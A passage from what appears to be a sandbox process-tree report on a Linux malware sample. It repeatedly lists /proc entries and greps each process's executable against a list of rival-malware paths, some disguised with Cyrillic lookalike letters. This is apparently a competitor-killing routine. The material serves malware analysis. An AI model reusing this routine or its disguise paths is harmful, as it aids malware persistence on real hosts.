  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:847
- /bin/grep
  grep exe
  2⤵
  PID:850
- /bin/ls
  ls -latrh /proc/23
  2⤵
  PID:849
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:852
- /bin/ls
  ls -latrh /proc/24
  2⤵
  PID:854
- /bin/grep
  grep exe
  2⤵
  PID:855
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:857
- /bin/ls
  ls -latrh /proc/3
  2⤵
  PID:859
- /bin/grep
  grep exe
  2⤵
  PID:860
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:862
- /bin/grep
  grep exe
  2⤵
  PID:865
- /bin/ls
  ls -latrh /proc/316
  2⤵
  PID:864
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:867
- /bin/ls
  ls -latrh /proc/319
  2⤵
  PID:869
- /bin/grep
  grep exe
  2⤵
  PID:870
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:872
- /bin/ls
  ls -latrh /proc/320
  2⤵
  PID:874
- /bin/grep
  grep exe
  2⤵
  PID:875
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:877
- /bin/grep
  grep exe
  2⤵
  PID:880
- /bin/ls
  ls -latrh /proc/321
  2⤵
  PID:879
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:882
- /bin/grep
  grep exe
  2⤵
  PID:887
- /bin/ls
  ls -latrh /proc/350
  2⤵
  PID:886
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:889
- /bin/grep
  grep exe
  2⤵
  PID:893
- /bin/ls
  ls -latrh /proc/36
  2⤵
  PID:892
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:896
- /bin/ls
  ls -latrh /proc/37
  2⤵
  PID:898
- /bin/grep
  grep exe
  2⤵
  PID:899
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:902
- /bin/ls
  ls -latrh /proc/370
  2⤵
  PID:905
- /bin/grep
  grep exe
  2⤵
  PID:906
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:908
- /bin/ls
  ls -latrh /proc/372
  2⤵
  PID:914
- /bin/grep
  grep exe
  2⤵
  PID:915
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:918
- /bin/ls
  ls -latrh /proc/380
  2⤵
  PID:921
- /bin/grep
  grep exe
  2⤵
  PID:922
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:925
- /bin/ls
  ls -latrh /proc/395
  2⤵
  PID:927
- /bin/grep
  grep exe
  2⤵
  PID:928
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:931
- /bin/ls
  ls -latrh /proc/4
  2⤵
  PID:934
- /bin/grep
  grep exe
  2⤵
  PID:935
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:938
- /bin/ls
  ls -latrh /proc/470
  2⤵
  PID:941
- /bin/grep
  grep exe
  2⤵
  PID:942
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:944
- /bin/ls
  ls -latrh /proc/484
  2⤵
  PID:947
- /bin/grep
  grep exe
  2⤵
  PID:948
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:951
- /bin/ls
  ls -latrh /proc/5
  2⤵
  PID:953
- /bin/grep
  grep exe
  2⤵
  PID:954
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:958
- /bin/ls
  ls -latrh /proc/519
  2⤵
  PID:960
- /bin/grep
  grep exe
  2⤵
  PID:961
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:964
- /bin/grep
  grep exe
  2⤵
  PID:968
- /bin/ls
  ls -latrh /proc/520
  2⤵
  PID:967
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:970
- /bin/grep
  grep exe
  2⤵
  PID:974
- /bin/ls
  ls -latrh /proc/6
  2⤵
  PID:973
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:977
- /bin/ls
  ls -latrh /proc/67
  2⤵
  PID:979
- /bin/grep
  grep exe
  2⤵
  PID:980
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:984
- /bin/ls
  ls -latrh /proc/680
  2⤵
  PID:986
- /bin/grep
  grep exe
  2⤵
  PID:987
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:990
- /bin/grep
  grep exe
  2⤵
  PID:994
- /bin/ls
  ls -latrh /proc/694
  2⤵
  PID:993
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:996
- /bin/ls
  ls -latrh /proc/695
  2⤵
  PID:999
- /bin/grep
  grep exe
  2⤵
  PID:1000
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1003
- /bin/grep
  grep exe
  2⤵
  PID:1006
- /bin/ls
  ls -latrh /proc/699
  2⤵
  PID:1005
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1009
- /bin/ls
  ls -latrh /proc/7
  2⤵
  PID:1013
- /bin/grep
  grep exe
  2⤵
  PID:1014
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1017
- /bin/grep
  grep exe
  2⤵
  PID:1021
- /bin/ls
  ls -latrh /proc/70
  2⤵
  PID:1020
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1025
- /bin/grep
  grep exe
  2⤵
  PID:1029
- /bin/ls
  ls -latrh /proc/700
  2⤵
  PID:1028
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1033
- /bin/ls
  ls -latrh /proc/701
  2⤵
  PID:1035
- /bin/grep
  grep exe
  2⤵
  PID:1036
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1039
- /bin/ls
  ls -latrh /proc/702
  2⤵
  PID:1042
- /bin/grep
  grep exe
  2⤵
  PID:1043
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1045
- /bin/ls
  ls -latrh /proc/705
  2⤵
  PID:1048
- /bin/grep
  grep exe
  2⤵
  PID:1049
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1053
- /bin/ls
  ls -latrh /proc/71
  2⤵
  PID:1055
- /bin/grep
  grep exe
  2⤵
  PID:1056
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1059
- /bin/ls
  ls -latrh /proc/711
  2⤵
  PID:1061
- /bin/grep
  grep exe
  2⤵
  PID:1062
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1064
- /bin/grep
  grep exe
  2⤵
